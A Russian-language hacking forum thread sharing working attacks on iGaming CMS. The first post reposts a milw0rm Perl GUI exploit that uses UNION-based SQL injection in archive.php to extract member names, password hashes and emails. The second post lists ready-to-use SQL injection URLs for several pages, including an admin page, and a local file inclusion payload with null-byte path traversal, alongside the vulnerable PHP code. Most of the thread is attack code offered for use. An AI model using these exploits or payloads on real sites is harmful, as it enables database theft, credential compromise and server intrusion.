Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


iGaming CMS <= 1.3.1 Remote SQL Injection Exploit


  • Авторизуйтесь для ответа в теме
В теме одно сообщение

#1
aka PSIH

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
iGaming CMS <= 1.3.1 Remote SQL Injection Exploit

exp:
#!/usr/bin/perl

	use Tk;
	use Tk::BrowseEntry;
	use Tk::DialogBox;
	use LWP::UserAgent;

	$mw = new MainWindow(title => "UnderWHAT?!" );

	$mw->geometry ( '395x180' );
	$mw->resizable(0,0);

	$mw->Label(-text => '', -font => '{Verdana} 2',-foreground=>'red')->pack();
	$mw->Label(-text => 'iGaming cms <= 1.3.1 Remote Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
	$mw->Label(-text => 'found by gemaglabin [ mafia of antichat ]', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
	$mw->Label(-text => '', -font => '{Tahoma} 2 bold',-foreground=>'red')->pack();


	$fleft  = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne');
	$fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw');

	$url	  = 'http://test2.ru/igaming/';
	$user_id  = '1';
	$prefix   = 'sp_';
	$table	= 'users';
	$report   = '';
	


	$fleft->Label ( -text => 'Path to site index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' );

	$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' );

	$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$hash) ->pack ( -side => "top" , -anchor => 'w' );

	$fright->Label( -text => ' ')->pack();
	$fleft->Label( -text => ' ')->pack();
	
	$fleft->Label ( -text => "Test site vulnerability", -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Button(-text	=> "Test site vulnerability",
					-relief => "groove",
					-width => '30',
					-font => '{Verdana} 8 bold',
					-activeforeground => 'red',
					-command => \&test_vuln
				   )->pack();
				   
				   
	$fleft->Label ( -text => "Get all possible data ", -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
	$fright->Button(-text	=> 'Get data from database',
					-relief => "groove",
					-width => '30',
					-font => '{Verdana} 8 bold',
					-activeforeground => 'red',
					-command => \&get_hash
				   )->pack();
				  
	
	MainLoop();
	
	sub get_hash()
	{
		$xpl = LWP::UserAgent->new( ) or die;
		$InfoWindow=$mw->DialogBox(-title   => 'get hash from database', -buttons => ["OK"]);
		$res = $xpl->post($url."archive.php",['section'=>'-1 union select 1,2,concat_ws(char(32),pseudo,pass,email,nom),4 from '.$prefix.'members where id='.$user_id.'/*']);
		if($res->as_string =~ /Date Posted: (.*)</)
		{
			$hash = $1;
		}
	}

	 
	sub test_vuln()
	{
		$InfoWindow=$mw->DialogBox(-title   => 'test site vulnerability', -buttons => ["OK"]);
		$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
		$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
		$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
		$xpl = LWP::UserAgent->new( ) or die;
		$res = $xpl->post($url."archive.php",['section'=>"'"]);
		if($res->as_string =~ /Fatal error/i ) { $hash='SITE VULNERABLE'}
		else { $hash = 'SITE UNVULNERABLE'} 
	}
©milw0rm.com
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********

#2
xUnu

xUnu

    Байт

  • Members
  • Pip
  • 65 сообщений
iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com

SQL injection
mq=off
games.php

 $sql = "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` ";

   if (!empty($_REQUEST['title'])) {

	  $sql .= "WHERE `title` LIKE '$_REQUEST[title]%' ";

	  if (!empty($_REQUEST['section'])) {

		 $sql .= " AND `section` = '$_REQUEST[section]' ";

	  }

	  $sql .= " AND `published` = '1' ";

   } else {

	  if (!empty($_REQUEST['section'])) {

		$sql .= "WHERE `section` = '$_REQUEST[section]' AND `published` = '1' ";

	  } else {

		  $sql .= "WHERE `published` = '1' ";

...
 
 if ($sql == "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` WHERE `published` = '1' ORDER BY `title` ASC")
]
http://localhost/games.php?order=genre&section=%27+and+1=0+union+all+select+1,version%28%29,3,4,5,6,7--+&sort=
index.php
http://localhost/index.php?do=viewarticle&id=2'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9--+
previews.php
$preview = $db->Execute("SELECT * FROM `sp_previews` WHERE `id` = '$_REQUEST[id]'");
http://localhost/previews.php?do=view&id=1'+union+all+select+1,2,3,4,5--+


Admin Panel (SQL inj) (LFI)
LFI : support.php

]require_once("../sources/docs/$_REQUEST[id].php");
]
http://localhost/admin/support.php?id=../../file%00
SQL injection : screenshots.php
mq=off
]   if (isset($_REQUEST['s'])) {
	  $latestPreview = $db->Execute("SELECT id,title,section FROM `sp_screenshots` WHERE `section` = '$_REQUEST[s]' ORDER BY `id` DESC");
]
http://localhost/admin/screenshots.php?s=1'+and+1=0+union+all+select+1,version(),3--+

© для сильно умных (на античате опубликовал эти дыры я )))
[COLOR=White]
O_o


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных